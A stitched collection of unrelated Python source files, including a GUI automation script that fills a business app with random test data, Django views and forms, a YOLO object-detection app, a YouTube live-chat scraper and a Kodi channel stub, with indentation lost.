for _ in range (random.randrange(1,options)):
pyautogui.press('down')
pyautogui.press('enter')
time.sleep(stime)
def szamsor(length):
szamsor=""
for _ in range(length):
szamsor+=str(random.randrange(10))
return szamsor
def adoszam():
adoszam =""
for _ in range(8):
adoszam += str(random.randrange(10))
adoszam+="-" + str(random.randrange(10)) + "-" + str(random.randrange(10))+str(random.randrange(10))
return adoszam
titulusok=["PhD","DLA"]
c = open("ceg.txt",'r',encoding="utf8")
cegek=[]
for x in c:
x=x.strip()
cegek.append(x)
v = open("ceg.txt",'r',encoding='utf8')
varosok=[]
for x in v:
x=x.strip()
varosok.append(x)
k = open("kozterulet.txt",'r',encoding='utf8')
kozterulet=[]
for x in k:
x=x.strip()
kozterulet.append(x)
f = open("ferfi.txt","r",encoding="utf8")
n = open("no.txt",'r', encoding="utf8")
v = open("vezeteknev.txt",'r',encoding="utf8")
m = open("ugyfel\\munkak.txt",'r',encoding="utf8")
ferfinevek =[]
noinevek = []
vezeteknevek = []
munkak = []
for x in f:
x=x.strip()
ferfinevek.append(x)
f.close()
for x in n:
x = x.strip()
noinevek.append(x)
n.close()
for x in v:
x = x.strip()
vezeteknevek.append(x)
for x in m:
x=x.strip()
munkak.append(x)
f.close()
v.close()
f = open("ferfi.txt","r",encoding="utf8")
n = open("no.txt",'r', encoding="utf8")
v = open("vezeteknev.txt",'r',encoding="utf8")
#print(cegek)
while True:
#click(500,600)
iclick("ugyfel\\uj_ugyfel.png")
twrite(random.choice(cegek))
twrite(adoszam())
vevo = random.randrange(2)
tab()
if not vevo:
tab()
pyautogui.press("space")
iclick("mentes.png")
#sales
scroll_list(1150,470,3)
#iclick("sales.png")
click(500,470)
pyautogui.press("k")
time.sleep(stime/5)
pyautogui.press("down")
time.sleep(stime/5)
pyautogui.press("down")
time.sleep(stime/5)
pyautogui.press("down")
time.sleep(stime/5)
pyautogui.press("enter")
time.sleep(stime/5)
#szerkesztes
#iwrite("ugyfel\\csoportos_adoszam.png",adoszam())
write(420,330,adoszam())
cegjegyzekszam = str(random.randrange(10))+ "-"+str(random.randrange(10)) + "-" + szamsor(6)
write(1060,330,cegjegyzekszam)
#iwrite("ugyfel\\cegjegyzekszam.png")
click(400,400)
#iclick("ugyfel\\szekhely.png")
twrite(szamsor(4))
twrite(random.choice(varosok))
kozt = random.choice(kozterulet).split()
twrite(kozt[0])
twrite(kozt[-1])
twrite(szamsor(1))
iclick("ok.png")
click(1250,400)
#iclick("ugyfel\\levelezesi_cim.png")
twrite(szamsor(4))
twrite(random.choice(varosok))
kozt = random.choice(kozterulet).split()
twrite(kozt[0])
twrite(kozt[-1])
twrite(szamsor(1))
iclick("ok.png")
#write(1100,590,lorem.paragraph())
#iwrite("ugyfel\\ceg_info.png",lorem.paragraph())
label = random.randrange(2)
tries=0
while tries<3:
try:
if label==0:
#click(400,680)
iclick("ugyfel\\clientlabel1.png")
elif label == 1:
#click(500,680)
iclick("ugyfel\\clientlabel2.png")
tries= 3
except:
tries+=1
print("nem ismert fel egy képet, újrapróbálkozás..")
time.sleep(3)
iclick("ugyfel\\mentes.png")
iclick("ugyfel\\kontaktok.png")
iclick("ugyfel\\hozzaadas.png")
vnev=random.choice(vezeteknevek)
knev=random.choice(ferfinevek+noinevek)
twrite(vnev+ " " + knev)
telszam='06' + str(random.randrange(1,10)) + '0'
for x in range(7):
telszam += str(random.randrange(10))
twrite(telszam)
twrite(unidecode.unidecode(vnev+knev+"@gmail.com").lower())
tab()
if random.randrange(2):
pyautogui.press("space")
if not random.randrange(10):
twrite(random.choice(titulusok))
else:
tab()
twrite(lorem.sentence())
if label==0:
#click(400,680)
iclick("ugyfel\\CCPO1.png")
elif label == 1:
#click(500,680)
iclick("ugyfel\\CCPO2.png")
elif label == 2:
#click(600,860)
iclick("ugyfel\\CCPO3.png")
iclick("mentes.png")
iclick("ugyfel\\szerzodesek.png")
iclick("ugyfel\\hozzaadas.png")
twrite(lorem.sentence().split()[0])
tscroll(3)
tab()
tab()
Enter()
startdate = random.randrange(10)
enddate = random.randrange(startdate,20)
for _ in range(startdate):
time.sleep(stime/5)
pyautogui.press("right")
Enter()
tab()
tab()
Enter()
for _ in range(enddate):
time.sleep(stime/2)
pyautogui.press("right")
Enter()
tab()
if random.randrange(2):
pyautogui.press("space")
twrite(str(random.randrange(20)))
twrite("https://bit.ly/3Bq4jeX")
TEnter()
# clientlabel 1: 400, 680 clientlabel2:500,680 clientlabel3:600,680
#kontaktok: 530,190
#reszletek:400,190
#szerződések:680,190
#megrendelések:830,190
#virtuális TIG sablon: 1000,190
iclick("ugyfel\\tig.png")
iclick("ugyfel\\hozzaadas.png")
twrite(lorem.sentence())
twrite(lorem.sentence())
twrite(lorem.sentence())
TEnter()
iclick("ugyfel\\szamlazasra_kuld.png")
iclick("ugyfel\\vir_tig.png")
iclick("ugyfel\\plus.png")
time.sleep(ltime)
tab()
tab()
tab()
tab()
tab()
Enter()
startdate = random.randrange(10)
enddate = random.randrange(startdate,20)
for _ in range(startdate):
time.sleep(stime/5)
pyautogui.press("right")
Enter()
tab()
tab()
Enter()
for _ in range(enddate):
time.sleep(stime/2)
pyautogui.press("right")
Enter()
iclick("ugyfel\\plus_gray.png")
tscroll(3)
twrite(str(random.randrange(1000)))
tscroll(3)
twrite(str(random.randrange(1000)))
tscroll(3)
twrite(lorem.sentence())
TEnter()
#time.sleep(20)
iclick("ugyfel\\megrendelesek.png")
iclick("ugyfel\\hozzaadas.png")
twrite(random.choice(munkak))
tscroll(3)
tscroll(3)
tscroll(2)
TEnter()
time.sleep(ltime)
iclick("megrendeles\\dolgozok.png")
iclick("megrendeles\\uj_dolgozo.png")
twrite(str(random.randrange(2,500)))
time.sleep(ltime)
tab()
tab()
TEnter()
#iclick("megrendeles\\kereses.png")
click(800,670)
click(800,750)
TEnter()
startdate = random.randrange(10)
for _ in range(startdate):
time.sleep(stime/5)
pyautogui.press("right")
Enter()
TEnter()
if random.randrange(2):
iclick("megrendeles\\uj_szakmai_gyakorlat.png")
click(800,500)
tab()
tab()
TEnter()
startdate = random.randrange(10)
for _ in range(startdate):
time.sleep(stime/5)
pyautogui.press("right")
Enter()
twrite(str(random.randrange(20,41)))
TEnter()
time.sleep(ltime)
iclick("megrendeles\\hirdetesek.png")
iclick("megrendeles\\uj_hirdetes.png")
twrite(random.choice(munkak))
TEnter()
time.sleep(ltime)
pyautogui.press("browserback")
time.sleep(ltime)
iclick("megrendeles\\arak.png")
iclick("megrendeles\\uj_ar.png")
twrite(random.choice(munkak))
tab()
if random.randrange(2):
pyautogui.press("space")
tscroll(3)
twrite(str(random.randrange(1000,1500)))
twrite(str(random.randrange(500,1500)))
tscroll(3)
startdate = random.randrange(10)
tab()
TEnter()
for _ in range(startdate):
time.sleep(stime/5)
pyautogui.press("right")
Enter()
for _ in range(12):
time.sleep(stime/5)
pyautogui.press("right")
Enter()
time.sleep(ltime)
tipus = random.randrange(5)
if tipus == 0:
iclick("megrendeles\\hetkoznap.png")
elif tipus == 1:
iclick("megrendeles\\szombat.png")
elif tipus == 2:
iclick("megrendeles\\vasarnap.png")
elif tipus == 3:
iclick("megrendeles\\unnepnap.png")
elif tipus == 4:
iclick("megrendeles\\szakmai_gyak.png")
iclick("mentes.png")
#iclick("megrendeles\\reszletek.png")
time.sleep(ltime)
iclick("ugyfel\\ugyfelek_dropdown.png")
iclick("ugyfel\\ugyfelek.png")
|
983,781 | 3f9d3ee05be8a101618fd97afdcd4b5c18a2a559 | def first(xs):
"""
Returns the first element of a list, or None if the list is empty
"""
if not xs:
return None
return xs[0]
def second(xs):
"""
Returns the second element of a list, or None if the list is empty
"""
if not xs:
return None
return xs[1]
|
983,782 | 8e9eded6c3daf20d13e5fe7e6d3c82203d4fb8bf | from django.http import HttpResponse
from django.shortcuts import render
from .models import Product
# Create your views here.
def index(request):
products = Product.objects.all()
# Product.objects.filter()
# Product.objects.get() # For getting a single product
# Product.objects.save() #Inserting a new product or updating one
# return HttpResponse('Hello World')
return render(request,'index.html',{'products':products})
def new(request):
return HttpResponse('New Products')
|
983,783 | bdb75984e993c151d34ee3cd0c42cdf3968e9eda | from PIL import Image
from PIL import ImageDraw
import time
import signal
from firob.core.worker.worker import Worker
from robscreen import constants
from pkg_resources import resource_filename
import robscreen.core.bakebit_128_64_oled as oled
from robscreen.core.annuaire import Annuaire
class Screen(Worker):
def __init__(self):
Worker.__init__(self, 0.1)
print("Init Screen")
oled.init() # initialze SEEED OLED display
oled.clearDisplay() # clear the screen and set start position to top left corner
oled.setNormalDisplay() # Set display to normal mode (i.e non-inverse mode)
oled.setHorizontalMode() # Set addressing mode to Page Mode
picture = resource_filename('robscreen.resources', 'firob.png')
image = Image.open(picture).convert('1')
oled.drawImage(image)
self.__page = Annuaire.getInstance().getPage(Annuaire.PAGE_DEFAULT)
time.sleep(1)
def execute(self):
image = Image.new('1', (constants.WIDTH, constants.HEIGHT))
draw = ImageDraw.Draw(image)
self.__page.draw(draw)
oled.drawImage(image)
def end(self):
oled.clearDisplay()
def k1(self):
page_num = self.__page.k1()
self.__page = Annuaire.getInstance().getPage(page_num)
def k2(self):
page_num = self.__page.k2()
self.__page = Annuaire.getInstance().getPage(page_num)
def k3(self):
page_num = self.__page.k3()
self.__page = Annuaire.getInstance().getPage(page_num)
|
983,784 | 32fd83a8dd2d87e4322fae1f268e0623d2a877e9 | import os, sys
import errno
from pathlib import Path
import json
cwd = os.getcwd()
ASL_IMAGES = "/images/asl_images/"
TRAINING = cwd + ASL_IMAGES + "asl_alphabet_train/"
TESTING = ASL_IMAGES + "asl_alphabet_test/"
OUTPUT = cwd + "/json_output/"
TRAIN_OUT = OUTPUT + "training/"
TEST_OUT = OUTPUT + "testing/"
from OpenPoseExe import Command
class FileIO(object):
def __init__(self, input_dir=None, output_dir=None):
self.input_dir = input_dir
self.output_dir = output_dir
# reads a directory and returns a list of filenames
def read_image_strings(self, path=None):
imgs = []
if path is None and self.input_dir is not None:
path = self.input_dir
for root, dirs, files in os.walk(path):
for filename in files:
imgs.append(filename)
return imgs
def read_letter_data(self, letter=''):
files = self.read_image_strings(letter)
print(files)
def read_video_to_json(self, file_path):
pass
class OpenPoseIO(object):
def __init__(self):
self.f_io = FileIO(ASL_IMAGES)
self.cmd = Command()
# populate training data
def populate_training_data(self):
self.cmd.image_to_json(img_path=TRAINING, img_out=TRAIN_OUT)
if __name__ == "__main__":
openpose_io = OpenPoseIO()
openpose_io.populate_training_data()
|
983,785 | 0e29a9c0f12c4322bc005cb933dbb3bb52cbaf88 | from django.conf import settings
from django.contrib import messages
from django.contrib.auth.views import (
LoginView as BaseLoginView, LogoutView as BaseLogoutView, PasswordResetView as BasePasswordResetView,
PasswordResetConfirmView as BasePasswordResetConfirmView
)
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.core.urlresolvers import reverse_lazy
from django.db.transaction import atomic
from django.http import HttpResponseRedirect, Http404
from django.views.generic import ListView, CreateView, FormView, DetailView, View
from django.utils.translation import ugettext_lazy as _
from web.forms import AuthenticationForm, IterationCreateForm, RegistrationForm, PasswordResetForm, SetPasswordForm
from web.models import Iteration, Algorithm
from web.service import add_user_access, send_activation_mail, verify_activation_token
class LoginView(BaseLoginView):
"""
GET: Renders login form.
POST: Processes form and logs User in.
"""
template_name = 'users/login.html'
form_class = AuthenticationForm
class LogoutView(BaseLogoutView):
"""
GET: Log user out.
"""
class RegisterView(FormView):
"""
GET: Renders registration form.
POST: Processes registration form and creates and persists a User instance.
"""
template_name = 'users/register.html'
form_class = RegistrationForm
success_url = reverse_lazy('login')
@atomic
def form_valid(self, form):
user = form.save()
add_user_access(user=user)
send_activation_mail(request=self.request, user=user)
messages.add_message(
self.request,
level=messages.INFO,
message=_('Registracija uspješna. E-mail za aktivaciju poslan na {}.'.format(user.email))
)
return super().form_valid(form)
class RegisterConfirmView(View):
"""
GET: Verifies activation token and activates the user. Redirects appropriately.
"""
def get(self, request, *args, **kwargs):
token = self.kwargs.get('token', None)
uidb64 = self.kwargs.get('uidb64', None)
user_verified = verify_activation_token(uidb64=uidb64, token=token)
if user_verified:
messages.add_message(self.request, level=messages.INFO, message=_('Aktivacija uspješna.'))
return HttpResponseRedirect(redirect_to=settings.LOGIN_URL)
else:
raise Http404
class PasswordResetView(BasePasswordResetView):
"""
GET: Renders password reset form email.
POST: Processes form and send a reset link.
"""
template_name = 'users/password_reset.html'
form_class = PasswordResetForm
success_url = reverse_lazy('login')
def form_valid(self, form):
messages.add_message(self.request, level=messages.INFO, message=_('Aktivacijski link poslan na e-mail adresu.'))
return super().form_valid(form)
def form_invalid(self, form):
messages.add_message(self.request, level=messages.ERROR, message=_('Nepostojeća e-mail adresa.'))
return super().form_invalid(form)
class PasswordResetConfirmView(BasePasswordResetConfirmView):
"""
GET: Renders password change form.
POST: Processes form and resets password.
"""
INTERNAL_RESET_URL_TOKEN = 'nova'
template_name = 'users/password_confirm.html'
form_class = SetPasswordForm
success_url = reverse_lazy('login')
def form_valid(self, form):
messages.add_message(self.request, level=messages.INFO, message=_('Lozinka promijenjena.'))
return super().form_valid(form)
class HomeView(LoginRequiredMixin, ListView):
"""
GET: Renders iteration listing for user.
"""
template_name = 'home.html'
model = Iteration
context_object_name = 'iteration_list'
def get_queryset(self):
"""
Renders Iterations specific to logged in user.
"""
return super().get_queryset().filter(user=self.request.user)
class AlgorithmList(LoginRequiredMixin, ListView):
"""
GET: Renders submenu with algoritm listings.
"""
template_name = 'home.html'
model = Algorithm
context_object_name = 'algorithm_list'
def get_queryset(self):
return super().get_queryset().filter(users=self.request.user, is_active=True)
class AlgorithmDetail(LoginRequiredMixin, DetailView):
"""
GET: Renders submenu with algoritm listings.
"""
template_name = 'algorithm.html'
model = Algorithm
def get_queryset(self):
return super().get_queryset().filter(users=self.request.user, is_active=True)
class IterationCreateView(LoginRequiredMixin, CreateView):
"""
GET: Renders form to create Iteration.
POST: Processes form and creates Iteration instance.
"""
template_name = 'create_iteration.html'
model = Iteration
form_class = IterationCreateForm
success_url = reverse_lazy('home')
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
class IterationView(LoginRequiredMixin, UserPassesTestMixin, DetailView):
"""
GET: Renders Iteration details. Returns 403 if logged user is not parent to Iteration.
"""
template_name = 'iteration.html'
model = Iteration
raise_exception = True
def test_func(self):
if self.request.user == self.get_object().user:
return True
return False
|
983,786 | dcc94a72d205ad9a998792f2c1015ce989d5c5ae | import tkinter as tk
from PIL import Image, ImageTk
from tkinter.filedialog import askopenfilename
import numpy as np
import imutils
import time
import cv2
import os
import pyttsx3
root = tk.Tk()
root.title("object Detector")
root.geometry("800x550")
root.configure(background ="white")
title = tk.Label(text="Click below button to select picture", background = "white", fg="Brown", font=("", 15))
title.grid(row=0, column=2, padx=10, pady = 10)
# One time initialization
engine = pyttsx3.init()
# Set properties _before_ you add things to say
engine.setProperty('rate', 125) # Speed percent (can go over 100)
engine.setProperty('volume', 1) # Volume 0-1
# load the COCO class labels our YOLO model was trained on
LABELS = open("coco.names").read().strip().split("\n")
# load our YOLO object detector trained on COCO dataset (80 classes)
print("[INFO] loading YOLO from disk...")
net = cv2.dnn.readNetFromDarknet("yolov3.cfg", "yolov3.weights")
# initialize a list of colors to represent each possible class label
np.random.seed(42)
COLORS = np.random.randint(0, 255, size=(len(LABELS), 3),
dtype="uint8")
ln = net.getLayerNames()
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
def clear():
cv2.destroyAllWindows()
rtitle.destroy()
def analysis():
global rtitle
(W, H) = (None, None)
frame = cv2.imread(path)
frame = imutils.resize(frame, width=400)
# if the frame dimensions are empty, grab them
if W is None or H is None:
(H, W) = frame.shape[:2]
blob = cv2.dnn.blobFromImage(frame, 1 / 255.0, (416, 416),
swapRB=True, crop=False)
net.setInput(blob)
start = time.time()
layerOutputs = net.forward(ln)
end = time.time()
# initialize our lists of detected bounding boxes, confidences,
# and class IDs, respectively
boxes = []
confidences = []
classIDs = []
centers = []
# loop over each of the layer outputs
for output in layerOutputs:
# loop over each of the detections
for detection in output:
# extract the class ID and confidence (i.e., probability)
# of the current object detection
scores = detection[5:]
classID = np.argmax(scores)
confidence = scores[classID]
# filter out weak predictions by ensuring the detected
# probability is greater than the minimum probability
if confidence > 0.5:
# scale the bounding box coordinates back relative to
# the size of the image, keeping in mind that YOLO
# actually returns the center (x, y)-coordinates of
# the bounding box followed by the boxes' width and
# height
box = detection[0:4] * np.array([W, H, W, H])
(centerX, centerY, width, height) = box.astype("int")
# use the center (x, y)-coordinates to derive the top
# and and left corner of the bounding box
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
# update our list of bounding box coordinates,
# confidences, and class IDs
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
classIDs.append(classID)
centers.append((centerX, centerY))
# apply non-maxima suppression to suppress weak, overlapping
# bounding boxes
idxs = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.3)
texts = []
# ensure at least one detection exists
if len(idxs) > 0:
# loop over the indexes we are keeping
for i in idxs.flatten():
# extract the bounding box coordinates
(x, y) = (boxes[i][0], boxes[i][1])
(w, h) = (boxes[i][2], boxes[i][3])
# draw a bounding box rectangle and label on the frame
color = [int(c) for c in COLORS[classIDs[i]]]
cv2.rectangle(frame, (x, y), (x + w, y + h), color, 2)
text = "{}: {:.4f}".format(LABELS[classIDs[i]],
confidences[i])
cv2.putText(frame, text, (x, y - 5),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
#find positions of objects
centerX, centerY = centers[i][0], centers[i][1]
if centerX <= W/3:
W_pos = "left "
elif centerX <= (W/3 * 2):
W_pos = "center "
else:
W_pos = "right "
if centerY <= H/3:
H_pos = "top "
elif centerY <= (H/3 * 2):
H_pos = "mid "
else:
H_pos = "bottom "
texts.append(H_pos + W_pos + LABELS[classIDs[i]])
rtitle = tk.Label(text=texts, background = "white", font=("", 15))
rtitle.grid(row=2, column=4, padx=10, pady = 10)
cv2.imshow("Image", frame)
clearbutton = tk.Button(text="Clear", command=clear)
clearbutton.grid(row=5, column=2, padx=10, pady = 10)
if texts:
finaltext = ', '.join(texts)
engine.say(finaltext)
# Flush the say() queue and play the audio
engine.runAndWait()
def openphoto():
global path
path=askopenfilename(filetypes=[("Image File",'.jpg')])
frame = cv2.imread(path)
cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
cv2image = imutils.resize(cv2image, width=250)
img = Image.fromarray(cv2image)
tkimage = ImageTk.PhotoImage(img)
myvar=tk.Label(root,image = tkimage, height="224", width="224")
myvar.image = tkimage
myvar.place(x=1, y=0)
myvar.grid(row=3, column=2 , padx=10, pady = 10)
button2 = tk.Button(text="Analyse Image", command=analysis)
button2.grid(row=4, column=2, padx=10, pady = 10)
def capture():
global path
cam = cv2.VideoCapture(0)
time.sleep(0.5)
ret, img = cam.read()
captured = cv2.imwrite("./Captured_images/Captured.jpg", img)
cam.release()
path = "./Captured_images/Captured.jpg"
frame = cv2.imread(path)
cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
cv2image = imutils.resize(cv2image, width=250)
img = Image.fromarray(cv2image)
tkimage = ImageTk.PhotoImage(img)
myvar=tk.Label(root,image = tkimage, height="224", width="224")
myvar.image = tkimage
myvar.place(x=1, y=0)
myvar.grid(row=3, column=2 , padx=10, pady = 10)
button2 = tk.Button(text="Analyse Image", command=analysis)
button2.grid(row=4, column=2, padx=10, pady = 10)
def vedio1():
vs = cv2.VideoCapture("video.mp4")
(W, H) = (None, None)
# loop over frames from the video file stream
while True:
# read the next frame from the file
(grabbed, frame) = vs.read()
frame = imutils.resize(frame, width=400)
# if the frame was not grabbed, then we have reached the end
# of the stream
if not grabbed:
break
# if the frame dimensions are empty, grab them
if W is None or H is None:
(H, W) = frame.shape[:2]
# construct a blob from the input frame and then perform a forward
# pass of the YOLO object detector, giving us our bounding boxes
# and associated probabilities
blob = cv2.dnn.blobFromImage(frame, 1 / 255.0, (416, 416),
swapRB=True, crop=False)
net.setInput(blob)
start = time.time()
layerOutputs = net.forward(ln)
end = time.time()
# initialize our lists of detected bounding boxes, confidences,
# and class IDs, respectively
boxes = []
confidences = []
classIDs = []
centers = []
# loop over each of the layer outputs
for output in layerOutputs:
# loop over each of the detections
for detection in output:
# extract the class ID and confidence (i.e., probability)
# of the current object detection
scores = detection[5:]
classID = np.argmax(scores)
confidence = scores[classID]
# filter out weak predictions by ensuring the detected
# probability is greater than the minimum probability
if confidence > 0.5:
# scale the bounding box coordinates back relative to
# the size of the image, keeping in mind that YOLO
# actually returns the center (x, y)-coordinates of
# the bounding box followed by the boxes' width and
# height
box = detection[0:4] * np.array([W, H, W, H])
(centerX, centerY, width, height) = box.astype("int")
# use the center (x, y)-coordinates to derive the top
# and and left corner of the bounding box
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
# update our list of bounding box coordinates,
# confidences, and class IDs
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
classIDs.append(classID)
centers.append((centerX, centerY))
# apply non-maxima suppression to suppress weak, overlapping
# bounding boxes
idxs = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.3)
texts = []
# ensure at least one detection exists
if len(idxs) > 0:
# loop over the indexes we are keeping
for i in idxs.flatten():
# extract the bounding box coordinates
(x, y) = (boxes[i][0], boxes[i][1])
(w, h) = (boxes[i][2], boxes[i][3])
# draw a bounding box rectangle and label on the frame
color = [int(c) for c in COLORS[classIDs[i]]]
cv2.rectangle(frame, (x, y), (x + w, y + h), color, 2)
text = "{}: {:.4f}".format(LABELS[classIDs[i]],
confidences[i])
cv2.putText(frame, text, (x, y - 5),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
#find positions of objects
centerX, centerY = centers[i][0], centers[i][1]
if centerX <= W/3:
W_pos = "left "
elif centerX <= (W/3 * 2):
W_pos = "center "
else:
W_pos = "right "
if centerY <= H/3:
H_pos = "top "
elif centerY <= (H/3 * 2):
H_pos = "mid "
else:
H_pos = "bottom "
texts.append(H_pos + W_pos + LABELS[classIDs[i]])
rtitle = tk.Label(text=texts, background = "white", font=("", 15))
rtitle.grid(row=2, column=4, padx=10, pady = 10)
cv2.imshow("Image", frame)
clearbutton = tk.Button(text="Clear", command=clear)
clearbutton.grid(row=5, column=2, padx=10, pady = 10)
if texts:
finaltext = ', '.join(texts)
engine.say(finaltext)
# Flush the say() queue and play the audio
engine.runAndWait()
button1 = tk.Button(text="Select Photo", command = openphoto)
button1.grid(row=1, column=2, padx=10, pady = 10)
capbut = tk.Button(text="Capture", command = capture)
capbut.grid(row=2, column=2, padx=10, pady = 10)
vidbut = tk.Button(text="video", command = vedio1)
vidbut.grid(row=1, column=3, padx=10, pady = 10)
root.mainloop()
print("[INFO] Closing ALL")
print("[INFO] Closed")
|
983,787 | 89b81d2dee45ecc86d8c5ee66401c5aaaa29c0e1 | from django import forms
class LoginForm(forms.Form):
username = forms.CharField(widget=forms.TextInput(attrs={'class': 'input100', 'type': 'text', 'name': 'username', 'placeholder': 'Type your username'}))
password = forms.CharField(widget=forms.TextInput(attrs={'class': 'input100', 'type': 'password', 'name': 'password', 'placeholder': 'Type your username'}))
class RegistrationForm(forms.Form):
firstname = forms.CharField(widget=forms.TextInput(attrs={'class': 'input100', 'type': 'text', 'name': 'firstname', 'placeholder': 'Type your firstname'}))
lastname = forms.CharField(widget=forms.TextInput(attrs={'class': 'input100', 'type': 'text', 'name': 'lastname', 'placeholder': 'Type your lastname'}))
email = forms.CharField(widget=forms.TextInput(attrs={'class': 'input100', 'type': 'email', 'name': 'email', 'placeholder': 'Type your email'}))
username = forms.CharField(widget=forms.TextInput(attrs={'class': 'input100', 'type': 'text', 'name': 'username', 'placeholder': 'Type your username'}))
password = forms.CharField(widget=forms.TextInput(attrs={'class': 'input100', 'type': 'password', 'name': 'password', 'placeholder': 'Type your password'}))
confirm_password = forms.CharField(widget=forms.TextInput(attrs={'class': 'input100', 'type': 'password', 'name': 'confirm-password', 'placeholder': 'Type your password again'})) |
983,788 | 6b7730fdeec85f42a4a3db217ec6dc59eac96c46 | """Series serializers."""
# Django REST Framework
from rest_framework import serializers
# Models
from seriesapi.series.models import Serie, Season, Episode
class EpisodeModelSerializer(serializers.ModelSerializer):
"""Episode model serializer."""
class Meta:
"""Meta class."""
model = Episode
fields = ('title', )
class SeasonModelSerializer(serializers.ModelSerializer):
"""Season model serializer."""
episodes = EpisodeModelSerializer(many=True)
class Meta:
"""Meta class."""
model = Season
fields = ('title', 'episodes')
class SerieModelSerializer(serializers.ModelSerializer):
"""Serie model serializer."""
seasons = SeasonModelSerializer(many=True)
class Meta:
"""Meta class."""
model = Serie
fields = ('title', 'description', 'seasons')
|
983,789 | 43565a196265d473081101eaf3c31156a5a1a85c | from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
import string
from helperfunctions import *
import time
try:
start_time = time.time()
url = raw_input("Please enter a url: ")
num = raw_input("Please enter number of minutes you would like the program to run: ")
driver = webdriver.Firefox()
# Create a popup url
popup_url = string.replace(url, "watch", "live_chat")
popup_url = popup_url.strip(" ") + "&is_popout=1"
driver.get(url)
window_youtube = driver.window_handles[0]
driver.implicitly_wait(30)
tmp_video_name = WebDriverWait(driver,20).until(EC.presence_of_element_located
((By.XPATH, """// *[ @ id = "container"] / h1""")))
video_name = tmp_video_name.text
time.sleep(10)
tmp_date = WebDriverWait(driver, 10).until(EC.presence_of_element_located
((By.XPATH, """//*[@id="upload-info"]""")))
date = tmp_date.text
time.sleep(2)
tmp_views = WebDriverWait(driver, 10).until(EC.presence_of_element_located
((By.XPATH, """//*[@id="count"]""")))
views = tmp_views.text
time.sleep(2)
tmpauthor_name = WebDriverWait(driver, 10).until(EC.presence_of_element_located
((By.XPATH, """ //*[@id="owner-name"]/a""")))
author_name = tmpauthor_name.text
time.sleep(10)
#second tab
driver.execute_script("window.open('about:blank', 'tab2');")
driver.switch_to.window("tab2")
driver.get(popup_url)
driver.implicitly_wait(30)
SCROLL_PAUSE = 10
full_authorlist = []
full_commentlist = []
time_out = time.time() + 60*int(num)
# comment_div = driver.find_element_by_xpath("""// *[ @ id = "message"] """)
while True:
comment_div = driver.find_element_by_xpath("""// *[ @ id = "message"] """)
comments = comment_div.find_elements_by_xpath("""// *[ @ id = "message"] """)
authors = comment_div.find_elements_by_xpath("""//*[@id="author-name"]""")
for comment in comments:
full_commentlist.append(comment.text)
for author in authors:
full_authorlist.append(author.text)
driver.find_element_by_tag_name('html').send_keys(Keys.END)
time.sleep(SCROLL_PAUSE/2)
if (time.time() > time_out):
break
create_youtube_excel_live(str(url), video_name, author_name, views, date, full_authorlist, full_commentlist)
except TimeoutException:
print("TimeoutException")
driver.quit()
finally:
driver.quit()
|
983,790 | 5f173f0dc5b5a53b6370339e5ba23b0768f6106c | l=['WELCOME','TO','CCC','GOOD', 'LUCK', 'TODAY']
d={}
nu=int(input())
c=0
while l:
if c not in d:
d[c]=[[l[0]], len(l[0])+1]
l.remove(l[0])
elif (d[c][1]+len(l[0]))>nu:
d[c][1]=d[c][1]+1-len(d[c][0])
c=c+1
else:
d[c][0].append(l[0])
d[c][1]=d[c][1]+len(l[0])+1
l.remove(l[0])
d[max(d)][1]=d[max(d)][1]+1-len(d[max(d)][0])
for i in d:
e=''
h=nu-d[i][1]+1
if (len(d[i][0])-1)==0:
po=h
op=0
else:
po=h//(len(d[i][0])-1)
op=h%(len(d[i][0])-1)
for k in range(0, len(d[i][0])-1):
e=e+d[i][0][k]+'.'*po
if op>0:e=e+'.'
op=op-1
e=e+d[i][0][len(d[i][0])-1]
if len(d[i][0])==1:
e=e+'.'*po
print(e) |
983,791 | 0d14e2b2ece42ecb7bce3c8bf28b3c487c3697a8 | from typing import Union, Optional
import numpy as np
from transformers.pipelines import ArgumentHandler
from transformers import (
Pipeline,
PreTrainedTokenizer,
ModelCard
)
class MultiLabelPipeline(Pipeline):
def __init__(
self,
model: Union["PreTrainedModel", "TFPreTrainedModel"],
tokenizer: PreTrainedTokenizer,
modelcard: Optional[ModelCard] = None,
framework: Optional[str] = None,
task: str = "",
args_parser: ArgumentHandler = None,
device: int = -1,
binary_output: bool = False,
threshold: float = 0.3
):
super().__init__(
model=model,
tokenizer=tokenizer,
modelcard=modelcard,
framework=framework,
args_parser=args_parser,
device=device,
binary_output=binary_output,
task=task
)
self.threshold = threshold
def __call__(self, *args, **kwargs):
outputs = super().__call__(*args, **kwargs)
scores = 1 / (1 + np.exp(-outputs)) # Sigmoid
results = []
for item in scores:
labels = []
scores = []
for idx, s in enumerate(item):
if s > self.threshold:
labels.append(self.model.config.id2label[idx])
scores.append(s)
results.append({"labels": labels, "scores": scores})
return results
|
983,792 | df2accd0359f31bce9fbba9c4e585b9838025073 | # -*- coding: utf-8 -*-
import re
from channelselector import get_thumb
from core import httptools
from core import scrapertools
from core import servertools
from core.item import Item
from platformcode import config, logger
from core import tmdb
host = 'http://newpct1.com/'
def mainlist(item):
logger.info()
itemlist = []
thumb_pelis=get_thumb("channels_movie.png")
thumb_series=get_thumb("channels_tvshow.png")
thumb_search = get_thumb("search.png")
itemlist.append(Item(channel=item.channel, action="submenu", title="Películas", url=host,
extra="peliculas", thumbnail=thumb_pelis ))
itemlist.append(Item(channel=item.channel, action="submenu", title="Series", url=host, extra="series",
thumbnail=thumb_series))
itemlist.append(
Item(channel=item.channel, action="search", title="Buscar", url=host + "buscar", thumbnail=thumb_search))
return itemlist
def submenu(item):
logger.info()
itemlist = []
